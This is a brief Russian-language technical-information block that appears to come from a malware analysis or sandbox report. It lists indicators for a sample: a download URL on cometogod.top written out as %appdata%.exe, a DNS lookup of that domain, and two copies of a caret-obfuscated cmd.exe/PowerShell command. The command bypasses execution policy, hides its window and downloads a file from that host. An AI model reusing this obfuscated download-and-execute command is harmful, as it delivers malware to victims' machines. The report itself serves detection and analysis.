Техническая информация
- http://cometogod.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "po^w^E^RshElL.Ex^E -e^XE^c^uTI^o^NP^OliCY BYPA^S^s^ -N^Opr^of^i^LE -WIn^D^o^W^sT^Yl^E ^HiD^dE^N (nEw-oBj^ect SY^ste^m.^n^e^t.we^bCliE^NT).dOwnLo^a^dfILE^(^'http://cometogod....
- DNS ASK co###ogod.top
- '<SYSTEM32>\cmd.exe' /c "po^w^E^RshElL.Ex^E -e^XE^c^uTI^o^NP^OliCY BYPA^S^s^ -N^Opr^of^i^LE -WIn^D^o^W^sT^Yl^E ^HiD^dE^N (nEw-oBj^ect SY^ste^m.^n^e^t.we^bCliE^NT).dOwnLo^a^dfILE^(^'http://cometogod....' (со скрытым окном)